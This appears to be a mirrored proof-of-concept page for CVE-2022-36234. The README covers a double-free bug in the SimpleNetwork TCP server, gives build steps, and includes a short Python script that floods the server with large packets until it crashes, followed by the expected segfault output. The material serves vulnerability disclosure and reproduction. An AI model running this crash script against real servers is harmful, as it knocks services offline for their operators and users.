Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-36234 PoC — SimpleNetwork 资源管理错误漏洞

Source
https://github.com/Halcy0nic/CVE-2022-36234
Associated Vulnerability
Title:SimpleNetwork 资源管理错误漏洞 (CVE-2022-36234)
Description:SimpleNetwork是简单TCP服务。 SimpleNetwork 存在安全漏洞,该漏洞源于通过特制的TCP数据包制造双重释放漏洞。
Description
Proof of concept for CVE-2022-36234
Readme
# Description of CVE-2022-36234

SimpleNetwork TCP Server commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 was discovered to contain a double free vulnerability which is exploited via crafted TCP packets. Triggering the double free will allow clients to crash any SimpleNetwork TCP server remotely. In other situations, double free vulnerabilities can cause undefined behavior and potentially code execution in the right circumstances.

# Reproduction

To ensure you have the standard build tools required to compile the library, install the following packages (on most systems this will already be installed):

```
sudo apt-get install build-essential git
```

The vulnerability can be reproduced by sending consecutive requests to the server containing a large buffer of characters in a TCP packet.  First, compile the 'libSimpleNetwork' library and example server provided in the source code:

```
git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make
```

### Start the example-server:

```
./server 80 1
```

### Save the following python3 proof of concept script to a file (modify the host as needed):
```
import socket

host = "localhost"
port = 80                   # The same port as used by the server
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")
```

### Execute the python3 script:

```
python3 poc.py
```

### Crash verification:
If successful, the server will crash and you will see the following output from the application:
```
segmentation fault  ./server 80 1
```


# References

* https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
* https://cwe.mitre.org/data/definitions/415.html
* https://github.com/kashimAstro/SimpleNetwork/issues/22
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234
File Snapshot

 [4.0K]  /data/pocs/48e9a750079b34d1c3a4812b088d9fa53e9f94d2
├── [ 382]  poc.py
├── [2.0K]  README.md
└── [7.2K]  SimpleNetwork.zip

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.